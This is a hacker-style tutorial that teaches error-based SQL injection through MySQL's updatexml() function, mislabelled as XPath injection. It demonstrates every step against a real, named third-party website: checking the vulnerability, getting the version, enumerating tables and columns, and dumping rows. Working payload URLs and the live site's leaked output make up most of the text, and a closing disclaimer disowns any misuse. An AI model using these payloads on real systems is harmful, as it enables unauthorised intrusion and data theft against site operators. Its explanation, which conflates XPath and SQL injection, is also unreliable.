Xpath Injection Tutorial | SQL Injection

Xpath Injection Tutorial | SQL Injection


Xpath Injection Tutorial | Xpath Injection Using Updatexml()

SHORT Introduction :

Similar to SQL Injection, XPath Injections operate on web sites that uses user-supplied information to construct an XPath query for XML data. XPath Injections might be even more dangerous than SQL Injections since XPath lacks access control and allows querying of the complete database (XML document), whereas many SQL databases have meta tables that cannot be accessed by regular queries.

Quick Tutorial On Xpath Injection : (Basic Injection For Noob To Leet)

Checking Vulnerability:-

 http://www.plantandem.be/home.php?p=g&id=4'
Vulnerable .. As We Can See The Error ..

 Get Version:-
http://www.plantandem.be/home.php?p=g&id=4 and updatexml(0x3a,concat(0x3a,version()),null)--

 RESULT : XPATH syntax error: ':5.1.73-1+deb6u1-log'

 Get Tables:-

 http://www.plantandem.be/home.php?p=g&id=4 and updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--

 So First Table Is :
Result :: XPATH syntax error: ':actu'

 For Getting Other Tables .. We Have To Increase the limit 0,1 to 1,1 -- 2,1 -- 3,1
And So On.. Until We Get Reloaded Page :)

 Then You Can Choose Any Table Name For Getting its Columns ..

 I am Chosing This Table : 'actu'

 Ok So , Now lets enumerate its Columns.

For Getting Columns We Will Use This Query .
www.example.com/file.php?id=1 and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name= (' Name Of The Table Here.. Encoded in HEX .. [0x Table Name ] ' ) limit 0,1)),null)--

Like This :

http://www.plantandem.be/home.php?p=g&id=4 and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name=0x61637475 limit 0,1)),null)--

Result : 
XPATH syntax error: ':id'

Ok so First Column Of This Table is 'id'For Rest Of Columns Just Keep Changing limit ..

 Like This . :-

 http://www.plantandem.be/home.php?p=g&id=4 and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name=0x61637475 limit 1,1)),null)--

 Result : XPATH syntax error: ':auteur' ( Second Column )

 Now last step : Dumping Data out of it ..

 For Dumping Data .. We Will Use :

 www.example.com/file.php?id=1 and updatexml(null,concat(0x3a,(select concat('Name Of Columns Here') from 'Table Name Here' limit 0,1)),null)--

 Like This :-

 http://www.plantandem.be/home.php?p=g&id=4 and updatexml(null,concat(0x3a,(select concat(id,0x203a20,auteur) from actu limit 0,1)),null)--
0x203a3a20 = :: ( for separating Results )

 Result : XPATH syntax error: ':10 : Webmaster'

 Do Same For All Columns And Tables .. Just Check The Name Of Tables / Columns Carefully :)

 Note : This Is Purely For Sharing Knowledge . We Are Not Responsible For Action Performed By You.

 Thanks For Reading ..